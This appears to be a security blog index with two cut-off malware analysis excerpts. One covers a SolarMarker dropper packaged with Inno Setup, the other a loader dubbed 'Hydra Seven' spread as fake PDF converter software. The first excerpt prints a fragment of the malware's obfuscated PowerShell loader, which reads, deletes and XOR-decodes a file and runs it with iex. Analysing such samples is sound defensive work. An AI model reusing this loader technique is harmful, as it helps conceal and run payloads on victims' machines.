Security Magic

Squiblydoo came across a new variant of solarmarker malware and posted the finidings here: https://twitter.com/SquiblydooBlog/status/1717464614403735562 Unfortunately this new version no longer works with my extractor tool found here: https://github.com/securitymagic/tools/blob/main/extractsmdll.py However, RussianPanda posted a new tool which can be used after the Inno Package is extracted. A quick analysis suggests that the new dropper uses Inno Setup, some quick tools can pull some of the data, including a few of the powershell commands seen below. innounp -x -m .\Appendix-C-Acceptance-of-Acknowledgement-of-Policies-and.exe strings .\CompiledCode.bin WIN-VUA6POUV5UP 0CC47AC83803 JOHN-PC FkLmng TNewEdit Cancel {tmp} .pdf {tmp}\budget_fy2024.pdf \..\ \budget_fy2024.pdf open {tmp}\data.dat pSDubTWyjzdAhmBNLtROxasMKfJUPQVv iex([Text.Encoding]::UTF8.GetString((({$F=[IO.File]::ReadAllBytes($args[0]);(rm $args[0]);return $F}.invoke(' '))|%{$_ -bxor ...

Updated Nov 22, 2023 Updated notes are at the bottom of the page. Hello World! I am investigating a new malware loader and calling this unknown loader Hydra Seven . Here are some of the details. Over the past several weeks there has been some limited chatter about an interesting suspicious PDF software (pdfconverters.exe, pdfunk.exe). The first details I've run across with this were found on this twitter post https://twitter.com/neonprimetime/status/1711510658959749324 . The initial analysis suggests the malware may be related to redline through some heuristic detections from a couple security vendors. This is possible, though I haven't been able to verify Redline yet, I'm still working on it. I started digging a bit into the pdfconverters.exe, which leads to a download and install of AppData\Local\Temp\PDFunk-Setup.exe then ultiamtely AppData\Local\Programs\PDFunk\PDFunk.exe. Traffic when running PDFunk.exe shows a User-Agent that includes "PDFunk/1.0.0 ...